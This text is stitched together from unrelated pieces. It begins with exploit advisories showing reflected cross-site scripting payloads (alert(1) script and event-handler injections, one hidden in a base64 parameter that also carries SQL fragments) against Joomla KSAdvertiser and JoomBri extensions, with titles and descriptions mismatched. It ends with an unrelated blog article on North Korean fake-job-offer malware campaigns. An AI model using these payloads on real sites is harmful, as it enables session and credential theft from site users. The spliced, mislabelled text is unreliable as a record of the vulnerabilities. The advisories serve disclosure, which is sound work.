XSShttps://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en[-] Done

Joomla KSAdvertiser 2.5.37 Cross Site Scripting

Joomla JoomBri Careers extension version 3.3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Careers 3.3.0                                               ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /for-jobseekers/search-jobsGET parameter 'keyword' is vulnerable to XSShttps://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task=[-] Done

Joomla JoomBri Careers 3.3.0 Cross Site Scripting

Joomla JoomBri Freelance extension version 4.5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Freelance 4.5.0                                             ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'keyword' is vulnerable to XSShttps://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r[-] Done

Posted: October 5, 2022 by

Microsoft researchers are warning of fake job offers where the only actual compensation available is a golden handshake of malware and trickery. The campaign targets those with technical know-how because, despite what some may think, scams are for everybody, not just people unfamiliar with tech. With the right tactics and messaging, anyone is a potential target.

**A focused target list**

The attack targets people working in defence, media careers, aerospace, and IT services. You know, the kind of people who might have access confidential information, sensitive data, journalists, important passwords etc.

The danger here is not simply the initial compromise, but where it can lead. With access to a compromised system attackers have a bridgehead they can use to move into networks, exposing servers, databases, mailboxes, you name it. The starting and ending points for any given attack would be quite different, beginning in one industry and ending in another.

**How the attack works**

Microsoft attributes the attacks to a state-sponsored group it calls ZINC, which operates from North Korea. This group is all about theft and espionage, so the target list up above makes sense.

The way the attacks work tends to follow a similar pattern:

1.  Bogus LinkedIn profiles claiming to be recruiters in the US, UK, and India, scouting for talent. Potential victims are enticed into applying for non-existent posts at genuine companies.
    
2.  Victims are sent tampered versions of open-source software, away from LinkedIn. It’s the classic “move the victim away from the potential safety of the starting point” technique. MSFT researchers claim to have seen “at least” five methods of delivering infected applications to would-be job applicants.
    
3.  Tampered software includes KiTTY and PuTTY, both of which are popular secure shell (SSH) clients used for remote administration of computers. There’s also TightVNC, muPDF/Subliminal Recording, and Sumatra PDF Reader.
    
4.  The compromised software works in similar, but different ways. In order to avoid detection the software may require certain conditions to be met. For example, MSFT research mentions that weaponised copies of TightVNC Viewer will only install a backdoor when it's used to connect to particular host.
    
5.  Infected machines connect to a command and control (C2) server, used to monitor, issue commands, and install additional malware as and when it's needed.
    

**Bogus jobs: An endless scourge**

Fake job offers are a perennial favourite of malware slingers everywhere. Scammers don't have to guess what would-be job applicants want, so targeting them is easy, and applicants may be more willing to lower their guard, and may be less likely to alert HR or security about suspicious activity.

For example: If someone sends an employee a dubious PDF attachment they have no reason not to report it if they think it might be malicious. On the other hand, if an employee is looking for another job and someone sends them a bogus job offer or interview request, will they want to alert security about it and reveal that they're thinking of leaving the company?

This is why it’s essential to spot the flaws in job offers which sound too good to be true. As many of these attacks ride the coat-tails of legitimate businesses, the ball is actually in the victim’s court. Find the employment details for the business in question, and approach the organisation directly. If the supposed offer is bogus, you’ll know right away and can safely delete any and all rogue correspondence. Who knows, your enquiring nature may even makes yours a name a theoretical future employer may remember!

**RELATED ARTICLES**

Tag

#ssh